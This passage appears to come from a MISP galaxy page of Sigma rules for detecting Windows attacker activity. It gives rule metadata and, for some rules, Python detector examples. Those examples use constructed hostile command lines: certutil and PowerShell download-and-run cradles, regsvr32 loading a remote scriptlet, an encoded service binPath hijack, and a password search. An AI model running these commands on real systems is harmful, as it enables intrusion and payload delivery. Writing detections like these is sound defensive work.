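    return [f["name"] for f in filters if f["altitude"] == SYSMON_DEFAULT_ALTITUDE]


# Constructed process-creation events for the detection side (not real telemetry).
EVENTS = [
    {"Image": r"C:\Windows\System32\findstr.exe", "CommandLine": "findstr 385201",
     "ParentCommandLine": 'cmd.exe /c "fltmc | findstr 385201"'},
    {"Image": r"C:\Windows\System32\findstr.exe", "CommandLine": 'findstr /i "385201"',
     "ParentCommandLine": 'cmd.exe /c "fltmc filters | findstr /i 385201"'},
    {"Image": r"C:\Windows\System32\findstr.exe", "CommandLine": 'findstr /s /i "password" *.txt',
     "ParentCommandLine": "cmd.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c fltmc filters",
     "ParentCommandLine": "explorer.exe"},
]


def is_altitude_discovery(event):
    """True for findstr.exe invocations whose arguments contain Sysmon's default altitude."""
    image = event["Image"].lower()
    return image.endswith("\\findstr.exe") and SYSMON_DEFAULT_ALTITUDE in event["CommandLine"]


def triage(events):
    return [e["CommandLine"] for e in events if is_altitude_discovery(e)]


if __name__ == "__main__":
    print("Sysmon candidates by altitude:", filters_at_sysmon_altitude(parse_fltmc(FLTMC_OUTPUT)))
    for line in triage(EVENTS):
        print("ALERT:", line)
```

The last constructed event is the rule's blind spot: running "fltmc filters" on its own and reading the table, filtering it with PowerShell's Select-String, or reading the driver's Instances key from the registry never spawns findstr.exe, so none of those are covered here. The same parser is also useful defensively, to confirm that a renamed Sysmon driver is actually loaded.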

Internal MISP references

UUID 37db85d1-b089-490a-a59a-c7b6f984f480 which can be used as unique global reference for Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/16
falsepositive ['Unknown']
filename proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1518.001']
Related clusters

To see the related clusters, click here.

Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
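
The following Python is an added example of the two conditions this rule combines, a download-capable certutil verb plus a URL on a file-sharing or paste site (example code written for this page, not the Sigma rule's logic). It extracts switches in a windash-tolerant way so that slashes inside the URL are not mistaken for switches, parses the URL host with urllib, and matches it against a domain list. The domain list is an illustrative subset assumed for the example, not the rule's list, and the events are constructed.

```python
import re
from urllib.parse import urlsplit

# certutil verbs that write a fetched URL to disk.
DOWNLOAD_VERBS = {"urlcache", "verifyctl"}

# Illustrative subset of paste / file-sharing domains (an assumption, not the rule's list).
FILE_SHARING_DOMAINS = ("pastebin.com", "transfer.sh", "anonfiles.com", "mega.nz",
                        "cdn.discordapp.com", "raw.githubusercontent.com", "gofile.io")

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# A switch is '-' or '/' (or a Unicode dash) preceded by start-of-line or whitespace,
# so slashes inside URLs and paths are not treated as switches.
SWITCH_RE = re.compile(r"(?:^|\s)[-/\u2013\u2014](\w+)")

# Constructed process-creation events (not real telemetry).
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f https://pastebin.com/raw/abcd1234 C:\Users\Public\a.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r'certutil /urlcache /f "https://transfer.sh/get/xyz/payload.exe" C:\ProgramData\p.exe'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verifyctl -f -split https://cdn.discordapp.com/attachments/1/2/x.bin"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f https://updates.example.test/agent.msi C:\Temp\agent.msi"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\Windows\System32\ntdll.dll SHA256"},
]


def switches(cmdline):
    """Lower-cased switch names found on the command line."""
    return {s.lower() for s in SWITCH_RE.findall(cmdline)}


def url_hosts(cmdline):
    """Lower-cased host names of every http(s) URL on the command line."""
    hosts = []
    for url in URL_RE.findall(cmdline):
        host = urlsplit(url).hostname
        if host:
            hosts.append(host.lower())
    return hosts


def is_file_sharing_host(host):
    return any(host == d or host.endswith("." + d) for d in FILE_SHARING_DOMAINS)


def evaluate(event):
    """Matching file-sharing hosts for a certutil download, or None when the event does not match."""
    if not event["Image"].lower().endswith("\\certutil.exe"):
        return None
    if not switches(event["CommandLine"]) & DOWNLOAD_VERBS:
        return None
    hits = [h for h in url_hosts(event["CommandLine"]) if is_file_sharing_host(h)]
    return hits or None


if __name__ == "__main__":
    for event in EVENTS:
        print(evaluate(event), "<-", event["CommandLine"])
```

The fourth constructed event downloads from a host that is not on the list and therefore does not match this rule; it is left to the more generic certutil download rules, which is why this one can carry a high level while the domain list still has to be maintained.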

Internal MISP references

UUID 42a5f1e7-9603-4f6d-97ae-3f37d130d794 which can be used as unique global reference for Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ['Unknown']
filename proc_creation_win_certutil_download_file_sharing_domains.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

HackTool - Mimikatz Execution

Detects well-known Mimikatz command line arguments

Internal MISP references

UUID a642964e-bead-4bed-8910-1bb4d63e3b4d which can be used as unique global reference for HackTool - Mimikatz Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton
creation_date 2019/10/22
falsepositive ['Unlikely']
filename proc_creation_win_hktl_mimikatz_command_line.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.005', 'attack.t1003.006']
Related clusters

To see the related clusters, click here.

HackTool - CoercedPotato Execution

Detects the use of CoercedPotato, a tool for privilege escalation

Internal MISP references

UUID e8d34729-86a4-4140-adfd-0a29c2106307 which can be used as unique global reference for HackTool - CoercedPotato Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/10/11
falsepositive ['Unknown']
filename proc_creation_win_hktl_coercedpotato.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Potential PowerShell Downgrade Attack

Detects a PowerShell downgrade attack by comparing the host version with the engine version actually used (2.0)
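
As an added example of both sides of this description (example code written for this page, not the Sigma rule's logic), the Python below first flags command lines that request the 2.0 engine, tolerating "/" and Unicode dashes as the switch prefix and the short forms of -Version, and then applies the host-versus-engine comparison to constructed PowerShell "Engine state changed" (Event ID 400) records simplified to two fields. That the short forms -v, -ve, -ver and so on are accepted by powershell.exe is an assumption of the example; the events are constructed.

```python
import re

# Switch prefix may be '-', '/' or a Unicode dash; the flag may be -v ... -version (assumed short forms).
VERSION_2_FLAG = re.compile(r"""(?ix)
    (?:^|\s)[-/\u2013\u2014\u2015]      # switch prefix
    v(?:e|er|ers|ersi|ersio|ersion)?    # -v ... -version
    \s+ 2(?:\.0)?                       # engine version 2 / 2.0
    (?=\s|$|")
""")

# Constructed process-creation events (not real telemetry).
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -version 2 -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://example.test/a')"},
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -v 2 -enc SQBFAFgA"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell /ver 2.0 -File C:\Users\Public\a.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -version 5.1 -c Get-Process"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-Verb"},
]


def is_downgrade_cmdline(event):
    """True when powershell.exe is started with a request for the 2.0 engine."""
    image = event["Image"].lower()
    return image.endswith("\\powershell.exe") and VERSION_2_FLAG.search(event["CommandLine"]) is not None


# Constructed Event ID 400 records, reduced to the two version fields the comparison needs.
ENGINE_EVENTS = [
    {"EventID": 400, "HostVersion": "5.1.19041.1", "EngineVersion": "2.0"},
    {"EventID": 400, "HostVersion": "5.1.19041.1", "EngineVersion": "5.1.19041.1"},
]


def is_engine_downgrade(record):
    """A modern host driving the 2.0 engine is the downgrade signature."""
    return (record["EventID"] == 400
            and record["EngineVersion"].startswith("2.")
            and not record["HostVersion"].startswith("2."))


def triage(events, engine_events):
    return {
        "cmdline": [e["CommandLine"] for e in events if is_downgrade_cmdline(e)],
        "engine": [r for r in engine_events if is_engine_downgrade(r)],
    }


if __name__ == "__main__":
    for kind, hits in triage(EVENTS, ENGINE_EVENTS).items():
        print(kind, hits)
```

The 2.0 engine only runs where the "Windows PowerShell 2.0 Engine" optional feature (and the .NET Framework 3.5 it depends on) is installed; elsewhere the request fails with an error, but the attempt still appears in process creation and the rule still fires. Removing that feature is the fix, since it takes away the engine that predates script block logging and AMSI.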

Internal MISP references

UUID b3512211-c67e-4707-bedc-66efc7848863 which can be used as unique global reference for Potential PowerShell Downgrade Attack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harish Segar (rule)
creation_date 2020/03/20
falsepositive ['Unknown']
filename proc_creation_win_powershell_downgrade_attack.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Firewall Rule Deleted Via Netsh.EXE

Detects the removal of a port or application rule in the Windows Firewall configuration using netsh

Internal MISP references

UUID 1a5fefe6-734f-452e-a07d-fc1c35bce4b2 which can be used as unique global reference for Firewall Rule Deleted Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/14
falsepositive ['Legitimate administration activity', 'Software installations and removal']
filename proc_creation_win_netsh_fw_delete_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Remote File Download Via Desktopimgdownldr Utility

Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.

Internal MISP references

UUID 214641c2-c579-4ecb-8427-0cf19df6842e which can be used as unique global reference for Remote File Download Via Desktopimgdownldr Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/27
falsepositive ['Unknown']
filename proc_creation_win_desktopimgdownldr_remote_file_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Suspicious Windows Update Agent Empty Cmdline

Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags

Internal MISP references

UUID 52d097e2-063e-4c9c-8fbb-855c8948d135 which can be used as unique global reference for Suspicious Windows Update Agent Empty Cmdline in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/26
falsepositive ['Unknown']
filename proc_creation_win_wuauclt_no_cli_flags_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Certificate Exported Via PowerShell

Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

Internal MISP references

UUID 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb which can be used as unique global reference for Certificate Exported Via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/18
falsepositive ['Legitimate certificate exports by administrators. Additional filters might be required.']
filename proc_creation_win_powershell_export_certificate.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.execution', 'attack.t1552.004', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Set Files as System Files Using Attrib.EXE

Detects the execution of "attrib" with the "+s" flag to mark files as system files

Internal MISP references

UUID bb19e94c-59ae-4c15-8c12-c563d23fe52b which can be used as unique global reference for Set Files as System Files Using Attrib.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/04
falsepositive ['Unknown']
filename proc_creation_win_attrib_system.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Suspicious Service Path Modification

Detects service path modification via the "sc" binary to a suspicious command or path
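
An added Python example of this check (written for this page, not the Sigma rule's logic): it extracts the binPath= value from "sc config" command lines, handling the "binPath= value" spacing sc.exe requires and the optional \\server argument, and flags values that launch an interpreter or point into a user-writable directory. The command and directory indicator lists are assumptions for the example, not the rule's exact lists, and the events are constructed.

```python
import re

# Illustrative indicators of a suspicious service binary path (assumed, not the rule's exact lists).
SUSPICIOUS_COMMANDS = ("cmd ", "cmd.exe", "powershell", "pwsh", "rundll32", "regsvr32",
                       "mshta", "wscript", "cscript", "certutil")
SUSPICIOUS_DIRS = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\",
                   "\\public\\", "\\perflogs\\")

# Constructed process-creation events (not real telemetry).
EVENTS = [
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc config UsoSvc binPath= "cmd /c start powershell -enc SQBFAFgA"'},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc.exe config "Vendor Agent" binpath= "C:\Users\Public\svc.exe"'},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc config VendorAgent binPath= "C:\Program Files\Vendor\agent.exe"'},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r"sc config VendorAgent start= disabled"},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc \\SRV01 config Spooler binPath= "C:\Windows\Temp\spool.exe"'},
]


def tokenize(cmdline):
    """Split a Windows command line, unquoting double-quoted arguments."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def sc_config_binpath(cmdline):
    """The binPath= value of an 'sc config' command line, or None when there is none."""
    tokens = tokenize(cmdline)
    # an optional \\server argument may precede the verb
    args = [t for t in tokens[1:] if not t.startswith("\\\\")]
    if not args or args[0].lower() != "config":
        return None
    for i, tok in enumerate(args):
        if tok.lower().startswith("binpath="):
            # sc.exe expects 'binPath= value' (space after '='); tolerate 'binPath=value' too
            value = tok[len("binpath="):]
            if value:
                return value
            if i + 1 < len(args):
                return args[i + 1]
    return None


def is_suspicious_binpath(value):
    v = value.lower()
    return any(c in v for c in SUSPICIOUS_COMMANDS) or any(d in v for d in SUSPICIOUS_DIRS)


def evaluate(event):
    """The suspicious binPath value, or None when the event does not match."""
    if not event["Image"].lower().endswith("\\sc.exe"):
        return None
    binpath = sc_config_binpath(event["CommandLine"])
    if binpath and is_suspicious_binpath(binpath):
        return binpath
    return None


if __name__ == "__main__":
    for event in EVENTS:
        print(evaluate(event), "<-", event["CommandLine"])
```

The last constructed event shows the same change made against a remote host, which is why the server argument has to be skipped before looking for the verb. Set-Service in PowerShell or a direct write to the service's ImagePath registry value makes the same change without ever running sc.exe, so a registry-value rule on HKLM\SYSTEM\CurrentControlSet\Services\*\ImagePath is the companion to this one.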

Internal MISP references

UUID 138d3531-8793-4f50-a2cd-f291b2863d78 which can be used as unique global reference for Suspicious Service Path Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/21
falsepositive ['Unlikely']
filename proc_creation_win_sc_service_path_modification.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Cscript/Wscript Potentially Suspicious Child Process

Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. Malware such as Pikabot and Qakbot has been seen using similar techniques, as have many others.

Internal MISP references

UUID b6676963-0353-4f88-90f5-36c20d443c6a which can be used as unique global reference for Cscript/Wscript Potentially Suspicious Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')
creation_date 2023/05/15
falsepositive ['Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly.']
filename proc_creation_win_wscript_cscript_susp_child_processes.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Regsvr32 DLL Execution With Suspicious File Extension

Detects the execution of REGSVR32.exe with DLL files masquerading as other files
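
As an added example of this rule's logic (example code written for this page, not the Sigma rule's own), the Python below pulls the module arguments out of a regsvr32 command line, skipping the /s, /u, /n and /i:<param> switches, and flags any module whose extension is not one a COM server DLL would carry. The extension set is an illustrative assumption, not the rule's exact list, and the events are constructed.

```python
import re
from pathlib import PureWindowsPath

# Illustrative set of extensions a COM server DLL would not normally carry (assumed list).
MASQUERADE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".ico", ".txt",
                         ".rtf", ".dat", ".tmp", ".bin", ".db", ".log", ".pdf"}

# Constructed process-creation events (not real telemetry).
EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\Users\Public\holiday.jpg"},
    {"Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s /u "C:\ProgramData\cache\update.dat"'},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\vendor.ocx"'},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /n /i:http://example.test/a.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c type C:\Users\Public\holiday.jpg"},
]


def tokenize(cmdline):
    """Split a Windows command line, unquoting double-quoted arguments."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def regsvr32_modules(cmdline):
    """Non-switch arguments of a regsvr32 command line, i.e. the modules it will LoadLibrary."""
    tokens = tokenize(cmdline)
    # tokens[0] is regsvr32 itself; /s /u /n /i:<param> are switches, everything else is a module path
    return [t for t in tokens[1:] if not t.startswith(("/", "-"))]


def has_masquerade_extension(path):
    return PureWindowsPath(path).suffix.lower() in MASQUERADE_EXTENSIONS


def evaluate(event):
    """Module paths with a non-DLL extension, or an empty list when the event does not match."""
    if not event["Image"].lower().endswith("\\regsvr32.exe"):
        return []
    return [m for m in regsvr32_modules(event["CommandLine"]) if has_masquerade_extension(m)]


def triage(events):
    hits = []
    for event in events:
        flagged = evaluate(event)
        if flagged:
            hits.append((event["CommandLine"], flagged))
    return hits


if __name__ == "__main__":
    for cmdline, flagged in triage(EVENTS):
        print("ALERT:", flagged, "<-", cmdline)
```

regsvr32 does not care what the file is called: it loads the module with LoadLibrary and calls DllRegisterServer (DllUnregisterServer with /u, DllInstall with /i), so a ".jpg" with a valid PE header registers like any DLL. The fourth constructed event, the scrobj.dll scriptlet technique, deliberately does not match here because its module has a normal extension; it belongs to a different regsvr32 rule. Image-load telemetry (Sysmon event 7) records the module actually loaded whatever its extension, and is the natural companion to this command-line check.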

Internal MISP references

UUID 089fc3d2-71e8-4763-a8a5-c97fbb0a403e which can be used as unique global reference for Regsvr32 DLL Execution With Suspicious File Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), frack113
creation_date 2021/11/29
falsepositive ['Unlikely']
filename proc_creation_win_regsvr32_susp_extensions.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Remote CHM File Download/Execution Via HH.EXE

Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.

Internal MISP references

UUID f57c58b3-ee69-4ef5-9041-455bf39aaa89 which can be used as unique global reference for Remote CHM File Download/Execution Via HH.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/29
falsepositive ['Unknown']
filename proc_creation_win_hh_chm_remote_download_or_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.001']
Related clusters

To see the related clusters, click here.

Renamed NirCmd.EXE Execution

Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.

Internal MISP references

UUID 264982dc-dbad-4dce-b707-1e0d3e0f73d9 which can be used as unique global reference for Renamed NirCmd.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2024/03/11
falsepositive ['Unknown']
filename proc_creation_win_renamed_nircmd.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Suspicious Extrac32 Alternate Data Stream Execution

Detects the use of extrac32 to extract data from a cab file into an alternate data stream, hiding it from casual inspection

Internal MISP references

UUID 4b13db67-0c45-40f1-aba8-66a1a7198a1e which can be used as unique global reference for Suspicious Extrac32 Alternate Data Stream Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/26
falsepositive ['Unknown']
filename proc_creation_win_lolbin_extrac32_ads.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Suspicious Windows Trace ETW Session Tamper Via Logman.EXE

Detects the execution of "logman" utility in order to disable or delete Windows trace sessions

Internal MISP references

UUID cd1f961e-0b96-436b-b7c6-38da4583ec00 which can be used as unique global reference for Suspicious Windows Trace ETW Session Tamper Via Logman.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/02/11
falsepositive ['Legitimate deactivation by administrative staff', 'Installer tools that disable services, e.g. before log collection agent installation']
filename proc_creation_win_logman_disable_eventlog.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001', 'attack.t1070.001']
Related clusters

To see the related clusters, click here.

Potential Tampering With Security Products Via WMIC

Detects uninstallation or termination of security products using the WMIC utility

Internal MISP references

UUID 847d5ff3-8a31-4737-a970-aeae8fe21765 which can be used as unique global reference for Potential Tampering With Security Products Via WMIC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/01/30
falsepositive ['Legitimate administration']
filename proc_creation_win_wmic_uninstall_security_products.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Audio Capture via PowerShell

Detects audio capture via PowerShell Cmdlet.

Internal MISP references

UUID 932fb0d8-692b-4b0f-a26e-5643a50fe7d6 which can be used as unique global reference for Audio Capture via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/24
falsepositive ['Legitimate audio capture by legitimate user.']
filename proc_creation_win_powershell_audio_capture.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1123']
Related clusters

To see the related clusters, click here.

Computer Discovery And Export Via Get-ADComputer Cmdlet

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

Internal MISP references

UUID 435e10e4-992a-4281-96f3-38b11106adde which can be used as unique global reference for Computer Discovery And Export Via Get-ADComputer Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/10
falsepositive ["Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"]
filename proc_creation_win_powershell_computer_discovery_get_adcomputer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Arbitrary File Download Via MSPUB.EXE

Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files

Internal MISP references

UUID 3b3c7f55-f771-4dd6-8a6e-08d057a17caf which can be used as unique global reference for Arbitrary File Download Via MSPUB.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unknown']
filename proc_creation_win_mspub_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Arbitrary Code Execution Via Node.EXE

Detects the execution of node.exe, which is shipped with multiple software packages such as VMware and Adobe products, in order to execute arbitrary code, for example to establish a reverse shell as seen in Log4j attacks.

Internal MISP references

UUID 6640f31c-01ad-49b5-beb5-83498a5cd8bd which can be used as unique global reference for Potential Arbitrary Code Execution Via Node.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Unlikely']
filename proc_creation_win_node_abuse.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

UAC Bypass Using ChangePK and SLUI

Detects a UAC bypass that uses changepk.exe and slui.exe (UACMe 61)

Internal MISP references

UUID 503d581c-7df0-4bbe-b9be-5840c0ecc1fc which can be used as unique global reference for UAC Bypass Using ChangePK and SLUI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_changepk_slui.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Change Default File Association Via Assoc

Detects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

Internal MISP references

UUID 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 which can be used as unique global reference for Change Default File Association Via Assoc in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Admin activity']
filename proc_creation_win_cmd_assoc_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1546.001']
Related clusters

To see the related clusters, click here.

Fsutil Behavior Set SymlinkEvaluation

Detects use of "fsutil behavior set SymlinkEvaluation" to change how symbolic links are evaluated. A symbolic link is a type of file that contains a reference to another file; ransomware probably does this to make sure it is able to follow shortcuts on the machine in order to find the original file to encrypt.

Internal MISP references

UUID c0b2768a-dd06-4671-8339-b16ca8d1f27f which can be used as unique global reference for Fsutil Behavior Set SymlinkEvaluation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/02
falsepositive ['Legitimate use']
filename proc_creation_win_fsutil_symlinkevaluation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

LSASS Process Reconnaissance Via Findstr.EXE

Detects findstr commands that include the keyword lsass, which indicates reconnaissance activity for the LSASS process PID

Internal MISP references

UUID fe63010f-8823-4864-a96b-a7b4a0f7b929 which can be used as unique global reference for LSASS Process Reconnaissance Via Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Unknown']
filename proc_creation_win_findstr_lsass.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Deletion of Volume Shadow Copies via WMI with PowerShell

Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

Internal MISP references

UUID 21ff4ca9-f13a-41ad-b828-0077b2af2e40 which can be used as unique global reference for Deletion of Volume Shadow Copies via WMI with PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/20
falsepositive ['Unknown']
filename proc_creation_win_powershell_shadowcopy_deletion.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

HackTool - DInjector PowerShell Cradle Execution

Detects the use of the DInjector PowerShell cradle based on its specific flags

Internal MISP references

UUID d78b5d61-187d-44b6-bf02-93486a80de5a which can be used as unique global reference for HackTool - DInjector PowerShell Cradle Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/12/07
falsepositive ['Unlikely']
